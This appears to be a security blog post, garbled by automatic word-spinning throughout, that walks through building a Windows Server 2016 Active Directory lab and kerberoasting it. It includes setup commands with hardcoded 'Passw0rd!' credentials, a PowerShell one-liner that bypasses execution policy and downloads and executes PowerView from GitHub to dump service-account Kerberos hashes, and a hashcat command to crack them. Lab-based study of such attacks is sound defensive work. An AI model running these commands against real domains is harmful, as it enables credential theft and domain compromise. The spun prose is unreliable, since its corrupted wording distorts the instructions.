Let me opened upwards this amongst a few questions
- Do yous conduct maintain your ain penetration testing lab?
- Have yous installed Windows Server 2016 before?
- Do yous conduct maintain Active Directory at home?
- What version of PowerShell are yous running?
- How create yous configure AD via PS / CMD?
- Do yous know how to add together a workgroup machine / user to a domain via CMD / PowerShell inwards AD?
- Have yous performed the kerberoast attack, create yous know how to lab this?
- Finally conduct maintain yous reversed a KRB5TGS hash every bit associated amongst Kerberos using hashcat?
This weblog ship service is going to comprehend all of the above
If yous tin sack respond yes to all of the above, hence this weblog ship service is non the i for you, as well as that’s cool, thank yous for reading this far.If your response to whatsoever of the higher upwards questions is nope, or merely yous larn to a greater extent than or less of it but yous don’t know how to create all of the mentioned sections, I tell welcome to yous as well as delight read on.
This is non exactly for hackers, crackers as well as phreakers
H5N1 lot of what is going to live demoed inwards this ship service falls to a greater extent than nether Windows organisation administration.Some maybe thinking why demo both PowerShell as well as CMD, piece of cake respond DCPromo (Domain Controller Promoter) is offski, to live replaced past times PowerShell inwards whatsoever time to come Windows Server releases.
Worth noting that most of the PS commands inwards this ship service volition neglect if yous purpose an older versions of PS, such every bit the version bundled amongst server 2008. If you’re using an older version of server opt to follow the CMD AD install demo.
And finally
I’m no MCSE (I used to live a cisco engineer, who pushed into security) hence this may non live the most 1337 guide yous e'er read, but what it does create is work!For enquiry I read a few blogs, to a greater extent than or less Microsoft resources as well as hence watched to a greater extent than or less YouTube videos on how to install AD.
Mostly they all failed to explicate the total process, such every bit the requirement for ‘Remote Server Administration Tools Pack (RSAT)’. This is required to access ‘users as well as computers admin options’ via the GUI, useful if yous desire to add together a user or machine to AD (Unless yous are the variety of soul who loves to install AD minus the tools to administer your environs via the GUI, server essence delight stand upwards up!)
Requirements for this lab, as well as they are all free!
- 180 days lawsuit of Windows Server 2016 which tin sack live downloaded here: https://www.microsoft.com/en-us/evalcenter/evaluate-windows-server-2016
- Windows seven virtual box picture which tin sack live downloaded here: https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/
- Virtualbox: https://www.virtualbox.org/wiki/Downloads
- Time to create: i hour
I regret nothing
When I started this weblog ship service I was exactly going to live lazy as well as create a quick PS i liner, ta-da AD built. But I got thinking, is it incorrect to potentially exclude those who create non conduct maintain the base of operations skills to create a server, or configure AD, I don’t know? So spell to a greater extent than or less volition skim sections, thinking why exceptional this, as well as I larn that, I suspect to a greater extent than or less others, who may never of made a lab before, may think, that looks quite uncomplicated (It is as well as I retrieve fun) as well as I may conduct maintain a larn at edifice one.Some similar CTF, non me, I similar to create AD, exchange, as well as hence assault them, were all strange inwards our ain ways!
How to install server 2016 inwards virtualbox (VB)
Open VB click on New, this volition start the procedure to install a novel virtual machine.
Select Microsoft Windows nether Type as well as Windows 2016 (64-bit) nether Version as well as hence survive add together a Name.
If yous tin sack render to a greater extent than than 2GB of ram nether Memory size, I would recommend it, every bit server 2016 is fleck of a beast, but if yous can’t don’t stress every bit it volition run, exactly live it a lilliputian slow.
The default setting for Hard Disk size is 32GB as well as this is fine for the lab.
Select the default VDI (VirtualBox Disk Image) setting.
Select the default dynamically allocated storage option.
Select the default.
This should hence consummate the virtualbox Windows Server 2016 profile. This would live fine for tell a typical virtual machine, but for a server yous volition desire to alter the network adapter from NAT to Bridged.
This volition number inwards connecting the server to your ain network as well as also enable other local machines to access it.
And finally, I similar to add together a portion folder from my local host to the VB machine profile. This enables the local as well as VB host to swap files easily betwixt each host. If yous wishing to create this, click on Shared Folders on the profile as well as Add Share.
Now you’re ready to click Start on your server.
The first time yous click start VB volition asking the location of your downloaded Windows Server 2016 ISO.
Following clicking on start yous should run into Windows Server 2016 installation begin. When requested, select your language, fourth dimension as well as keyboard options.
Then click install now.
When prompted to select the operating system, select Windows Server 2016 Standard Evolution (Desktop Experience).
If yous selected the 1st choice yous volition live one-half trend to installing server core, goodness luck amongst that. ;0)
Following the version options yous volition live prompted to either upgrade or select custom install, yous desire to select the custom install which volition perform a create clean install onto the VB virtual difficult disk.
Then merely click Next.
Now the OS should start to install.
Once Windows Server 2016 has been installed, it volition prompt yous to add together a password for the local administrator account.
This is the describe concern human relationship used to contend AD.
So Windows Server 2016 is built. Now, yous are strongly recommended to install VB’s ‘Guest Additions’ these are designed to live installed within a virtual machine after the invitee operating organisation has been installed. They consist of device drivers as well as organisation applications that optimize the invitee operating organisation for amend performance as well as usability.
After clicking on Devices / Install Guest Additions CD picture – yous tin sack hold back as well as maybe yous volition live prompted to install them, I tell maybe every bit it seems to live a 50/50 if yous larn a prompt to install. Typically I give upwards waiting, as well as larn to This PC (Fancy call for mycomputer) hence double click on the mounted disk inwards crusade D:
This follows a trip the lite fantastic of Next, Next, Next as well as tick hither to “Always trust software from “Oracle Corporation” – Might live fourth dimension to indicate out, you’re non edifice a secure installation here, yous are edifice a lab to hack!
And reboot, larn used to this lol.
Following the reboot as well as logging dorsum in, this is a goodness fourth dimension to laid a static IP address, experience gratis to assay without, this is a lab after all, but all volition brake real apace if yous do. ;0)
Click on networks, hence click on Network settings.
Choose Ethernet, alter adapter options.
Or, exactly opened upwards whatsoever directory as well as glue inwards the following.
Control Panel\Network as well as Internet\Network as well as Sharing CenterThen click on the network carte du jour / Properties / highlight IPv4 / Properties
Before changing your dynamic address to a static IP address, exactly conduct maintain a authorities notation of your introduce allocated IP address as well as brand certain that whatsoever static address yous laid are inwards the same subnet.
NOTE: If your virtual NIC is nonetheless laid to NAT, alter it over to bridged now.
You tin sack sentiment your IP address past times opening PowerShell or CMD as well as typing inwards ipconfig
In this event my dynamically allocated IP address was:
IP address - 192.168.56.25
Subnet Mask - 255.255.255.0
Default Gateway - 192.168.56.1
DNS - 192.168.56.1So for a static IP address I add together the following:
IP address - 192.168.56.200
Subnet Mask - 255.255.255.0
Default Gateway - 192.168.56.1
Preferred DNS – 192.168.56.1 points to my domicile router.
At this phase yous may of noticed that if yous assay to re-create as well as glue text betwixt your psychical as well as VB machine it fails, this is annoying but a uncomplicated number to fix.
On the chore bar click on Devices / Shared Clipboard / Bidirectional.
And survive conduct maintain a snapshot at this phase hence yous tin sack curlicue dorsum if required.
As this is a lab yous volition 100% brake it at to a greater extent than or less indicate as well as it’s smashing to live able to apace curlicue things back.
How to create Active Directory using PowerShell
First verify that yous are using PowerShell version 5, authorities notation this is the version bundled amongst server 2016.If yous conduct maintain opted to create Server 2008R2 or Server 2012R2 OK, but the PowerShell commands volition fail. (Blogs ordinarily don’t refer this, it’s annoying, as well as spell it seems logical, non everyone is an skilful inwards PS, exactly similar I am not.)
By the trend if you’re non using PS version 5, all is non lost every bit yous could skip the adjacent department as well as purpose the CMD install option, which I volition document after on. Or yous could cheat as well as type dcpromo. ;0)
To sentiment your PS version type $PSVersionTable.PSVersion or Get-Host
$PSVersionTable.PSVersion
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Users\Administrator> $PSVersionTable.PSVersion
Major Minor Build Revision
----- ----- ----- --------
5 1 14393 693
PS C:\Users\Administrator> Get-Host
Name : ConsoleHost
Version : 5.1.14393.693
InstanceId : ae3b1d0e-dc1c-44d9-a538-7ae1c39ff2a7
UI : System.Management.Automation.Internal.Host.InternalHostUserInterface CurrentCulture : en-GB
CurrentUICulture : en-US
PrivateData : Microsoft.PowerShell.ConsoleHost+ConsoleColorProxy
DebuggerEnabled : True
IsRunspacePushed : False
Runspace : System.Management.Automation.Runspaces.LocalRunspace
Install AD amongst PowerShell version 5
In PS re-create as well as glue the below command, this does what it says it installs AD-Domain-ServicesInstall-windowsfeature AD-domain-services
After the install for AD-domain-services completes, if successful yous should run into the following.
Then yous demand to re-create as well as glue the below command to import the AD command module.
Import-Module ADDSDeployment
Following importing the AD deployment module yous are instantly inwards a seat to configure as well as finalise AD.
The below PS i liner (Which yous tin sack re-create as well as paste, into PS inwards i go) volition install AD every bit the showtime domain controller inwards a novel forest, (this agency this is the 1st AD installation).
It volition call your domain server1.hacklab.local (you tin sack call the domain anything yous like, but I volition refer to this domain call throughout the blog, as well as it may live less confusing on your 1st create to continue to the same name).
And it volition call the server server1 as well as identify all the log as well as NTDS (Gold pot which stores local password hashes) to the C:\Windows\ directory.
Copy as well as glue the below into PS it should live i line.
Install-ADDSForest -CreateDnsDelegation:$false ` -DatabasePath "C:\Windows\NTDS" ` -DomainMode "Win2012R2" ` -DomainName "server1.hacklab.local" ` -DomainNetbiosName "server1" ` -ForestMode "Win2012R2" ` -InstallDns:$true ` -LogPath "C:\Windows\NTDS" ` -NoRebootOnCompletion:$false ` -SysvolPath "C:\Windows\SYSVOL" ` -Force:$true 
Ok AD is technically built, but if yous were to hunt out Active Directory Users as well as Computers, located nether Windows Administration Tools yous would notice that yous cannot respect or opened upwards it.
This frustrated me for an hr or hence until I discovered the next weblog http://support.risualblogs.com/blog/2014/07/10/cannot-find-active-directory-users-and-computers-on-server-2012-and-r2/ which details why as well as how to add together ordinarily used AD features. (Good blog!)
Installing Remote Server Administration Tools Pack (RSAT)
PS C:\Users\Administrator> Install-WindowsFeature RSAT-ADDS
Success Restart Needed Exit Code Feature Result
------- -------------- --------- --------------
True No Success {Active Directory Administrative Center, A... After installing RSAT yous should hence live able to sentiment active directory users as well as computers nether windows administrative tools.
So to summarise AD create inwards PS, non quite a i liner I hoped for but nonetheless non bad
Install-windowsfeature AD-domain-services
Import-Module ADDSDeployment
Install-ADDSForest -CreateDnsDelegation:$false ` -DatabasePath "C:\Windows\NTDS" ` -DomainMode "Win2012R2" ` -DomainName "server1.hacklab.local" ` -DomainNetbiosName "server1" ` -ForestMode "Win2012R2" ` -InstallDns:$true ` -LogPath "C:\Windows\NTDS" ` -NoRebootOnCompletion:$false ` -SysvolPath "C:\Windows\SYSVOL" ` -Force:$true Install-WindowsFeature RSAT-ADDS
CMD Rocks!
The below hurts my eyes, for 2 reasons, every bit mentioned twice before dcpromo is going as well as secondly, yeah it requires hardcoded credentials inwards the script, run into department safeModeAdminPassword:Passw0rd!If the PS road is non for you, merely re-create as well as glue the below i liner into an administrator CMD musical rhythm out as well as it volition install all that is required for AD as well as its administration.
dcpromo /unattend /InstallDns:yes /dnsOnNetwork:yes /replicaOrNewDomain:domain /newDomain:forest /newDomainDnsName:server1.hacklab.local /DomainNetbiosName:server1 /databasePath:"c:\Windows\ntds" /logPath:"c:\Windows\ntdslogs" /sysvolpath:"c:\Windows\sysvol" /safeModeAdminPassword:Passw0rd! /forestLevel:2 /domainLevel:2 /rebootOnCompletion:yes 
Add domain users via CMD / PS
On your DC opened upwards CMD or PS as well as merely re-create as well as glue the below commands in.This volition add together a user to the domain
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Users\Administrator>net user user1 Passw0rd! /ADD /DOMAIN
The command completed successfully.Additionally add together that user into the domain administrative grouping (Bad user!)
C:\Users\Administrator>net grouping “Domain Admins” user1 /add
The command completed successfully.
To verify that the user has been added merely type the following:
PS C:\Users\Administrator> net users /domain
User accounts for \\WIN-DMAH1AAPBR9
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
krbtgt user1 user2
user3
The command completed successfully.Or larn to Windows Administrative Tools / Active Directory Users as well as Computers for GUI.
To verify that the user has been added to the domain administrative group.
C:\Users\Administrator>net grouping /domain "Domain Admins"
Group name Domain Admins
Comment Designated administrators of the domain
Members
-------------------------------------------------------------------------------
Administrator user1
The command completed successfully.
Important phase – Introducing the attacker
Now lets add together to a greater extent than or less other user, this fourth dimension continue them exactly every bit a criterion user, this is the describe concern human relationship yous volition purpose to add together your Windows seven VM machine to the domain.net user user2 Passw0rd! /ADD /DOMAIN
Spin upwards Windows seven VB machine
If yous downloaded the VB picture from https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/ installing the VB machine is every bit uncomplicated every bit clicking on the downloaded installer file as well as hence when Import Virtual Appliance options loads, double click on RAM as well as tweak to whatever yous tin sack afford to add together as well as survive tick Reinitialize the MAC address of all network cards choice hence click Import.
Once it’s imported click on network choice on the profile, as well as verify it is changed to gibe the same network your Server 2016 is on, hence start the VB machine.
Once loaded, it volition conduct maintain yous to the desktop. You’ll notice on the shroud wallpaper that it states that the user describe concern human relationship call is IEUser as well as the password is Passw0rd!
Open networks IPv4 location below.
Control Panel\Network as well as Internet\Network as well as Sharing CenterAnd this machine tin sack live left to have a dynamic IP address, but yous create require to laid the DNS IP address to gibe your Server 2016 IP address.
During the AD create it adds the DC every bit your DNS server. Your VB Win seven host volition road to the server 2016 box for DNS as well as this server volition intern road DNS requests it cannot sympathize straight to your domicile router, hence to the cyberspace as well as back.
Why laid the VM win seven DNS to road to the Server 2016, goodness question, respond AD uses domain names event server1.hacklab.local your domicile router volition non recognise this, but the server 2016 will.
You could perchance start setting upwards to a greater extent than or less static DNS rules on your domicile router, but why bother this is solely a lab after all.
So my windows seven network settings await similar the below.
After pressing OK, burn upwards CMD or PS as well as cheque that yous tin sack ping the Server 2016 box via its domain call server1.hacklab.local
C:\Windows\system32>ping server1.hacklab.local Pinging server1.hacklab.local [192.168.1.200] amongst 32 bytes of data: Reply from 192.168.1.200: bytes=32 time<1ms TTL=128
Reply from 192.168.1.200: bytes=32 time<1ms TTL=128
Ping statistics for 192.168.1.200:
Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate circular trip times inwards milli-seconds:If yous larn a reply, smashing if yous don’t, assay as well as ping the server via its IP address, if this fails cheque your network carte du jour settings on both machines, tin sack yous ping the default gateway from each machine as well as hence on.
Add the machine to the domain
This interests me, whatsoever criterion domain user past times default tin sack add together a virtual or physical machine to a domain.Useful on internals, stone up, responder to creds, hence add together a VB machine to their domain, yous tin sack instantly PowerShell to victory.
“You conduct maintain thirty mins to larn DA, if yous can’t larn it, you’re crap, null similar a fleck of swordfish pressure level lol ;0)”
Armed amongst the criterion user describe concern human relationship created before inwards AD.
Right click on Computer / Properties
And hence click on Change settings (Requires local admin rights, which yous conduct maintain every bit its your VB machine).
Under ‘To rename this figurer or alter its domain’ click Change.
Then add together your chosen domain call as well as press OK.
Then add together the criterion user describe concern human relationship (Not DA) as well as press OK.
If all plant yous should run into ‘Welcome to the server1.hacklab.local domain’.
Winner, winner, chicken dinner!
Reboot
And hence login amongst the criterion domain user describe concern human relationship yous used to add together the machine to the domain.
(notice how the machine instantly shows the domain call on login page).
Kerberoasting – And instantly the existent fun begins
I’m non going to endeavor to rewrite what has been hence elegantly written before, hence I volition merely quote from https://www.blackhillsinfosec.com/a-toast-to-kerberoast/ (Great blog!)“The Microsoft implementation of Kerberos tin sack live a fleck complicated, but the gist of the assault is that it takes payoff of legacy Active Directory back upwards for older Windows clients as well as the type of encryption used as well as the fundamental textile used to encrypt as well as sign Kerberos tickets. Essentially, when a domain describe concern human relationship is configured to run a service inwards the environment, such every bit MS SQL, a Service Principal Name (SPN) is used inwards the domain to associate the service amongst a login account. When a user wishes to purpose the specific resources they have a Kerberos ticket signed amongst NTLM hash of the describe concern human relationship that is running the service.”
Back on your Server 2016, yous demand to create a vulnerable service account.
To create this re-create as well as glue the below command into a CMD or PS session.
C:\Users\Administrator>setspn -s http/server1.hacklab.local:80 user1 Checking domain DC=server1,DC=hacklab,DC=local
Registering ServicePrincipalNames for CN=user1,CN=Users,DC=server1,DC=hacklab,DC=local
http/server1.hacklab.local:80 Updated objectThen create a novel directory (folder) on the desktop as well as hence opened upwards PowerShell as well as movement to the directory location inwards PowerShell.
cd C:\Users\User2\Desktop\HashYou are instantly ready to re-create as well as glue the i liner below into your PS session. This performs the kerberoast attack.
powershell -ep bypass -c "IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/nettitude/PoshC2/master/Modules/powerview.ps1 Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash1.txt" If this fails verify yous tin sack achieve the cyberspace every bit the i describe requires access to download as well as execute powerview.ps1If it worked, yous volition conduct maintain seen a file titled ‘kerb-Hash1’ appear inwards the created C:\Users\User2\Desktop\Hash directory
Open this text file, as well as yous volition run into the returned service describe concern human relationship amongst its correlating password hash.
Any domain user has the rights past times default on a criterion domain to asking a re-create of the service accounts as well as at that spot correlating password hash.
Hashcat
https://hashcat.net/hashcat/So yous got a hash, how create yous cleft it?
Well you’re inwards luck every bit hashcat conduct maintain added the Kerberos five TGS-REP etype 23 hash to their supported listing of hashes.
The syntax below volition run a lexicon assault against the hash, inwards an endeavor to contrary it.
hashcat64.exe -m 13100 "C:\Hash1.txt" C:\Rocktastic12a --outfile="C:\OutputHash1.txt"And below shows the results were the reversed password tin sack live read inwards the OutputHash1.txt
(This took Hashcat virtually xi minutes to run, Kerberos hashes tin sack conduct maintain quite a large amount of fourth dimension to reverse.
Thank yous for reading.
@myexploit2600
